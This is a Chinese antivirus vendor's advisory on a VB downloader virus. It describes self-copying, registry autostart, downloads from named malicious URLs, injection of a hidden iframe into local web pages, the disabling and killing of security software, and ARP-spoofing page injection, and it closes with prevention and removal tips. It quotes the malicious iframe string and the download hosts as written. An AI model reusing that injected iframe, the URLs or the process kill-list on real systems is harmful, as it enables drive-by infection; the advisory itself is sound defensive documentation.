“反病毒终结者下载器”病毒技术细节

这是一个VB语言编写的病毒，用NSpack加壳程序进行保护。

1、自我复制和自启动。将自己复制到windir下，文件名为：vsdrv.exe。同时在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下增加值vistadrv=vsdrv.exe，实现开机自启动。

2、尝试下载以下文件并运行：

http://zy3653.com/gz/1.txt

http://zy3653.com/gz/2.txt

http://www.wdsc888.cn/arp/rav.jpg

3、释放一个VBS脚本程序文件（s.vbe），该程序的功能为在本地文件中插入挂马网址。接着运行该脚本程序，试图向D，E，F分区中的index.asp，index.html，index.htm，default.asp，default.html等文件中插入“<iframesrc=http://upx.kmip.net/muma/1.htmwidht=0height=0></iframe>”，完成本地挂马过程。

4、禁用部分安全软件相关的服务。通过net命令禁止Windows自带防火墙，金山毒霸、Norton等杀毒软件相关的系统服务。

5、结束部分安全软件进程。遍厉系统中的活动进程，进行进程名的比对，如果发现是病毒关心的杀毒软件进程，则强行结束。

病毒关心的进程名有：ccenter.exe，rav.exe，runiep.exe，ras.exe，Iparmor.exe，360safe.exe，360tray.exe，kmailmon.exe等。

6、调用病毒生成的csrss.exe（并非Ｗindows操作系统的csrss.exe，为一ＡＲＰ欺骗挂马工具）进行ARP欺骗挂马。病毒调用route命令获得本网的网关IP地址，接着对其进行ＡＲＰ欺骗挂马，可导致通过网关的HTTP回应包都会被插入挂马网址，危害较大。

1安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。

2使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3不浏览不良网站，不随意下载安装可疑插件。

4不接收QQ、MSN、Emial等传来的可疑文件。

5上网时打开杀毒软件实时监控功能。

6把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.46.42版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。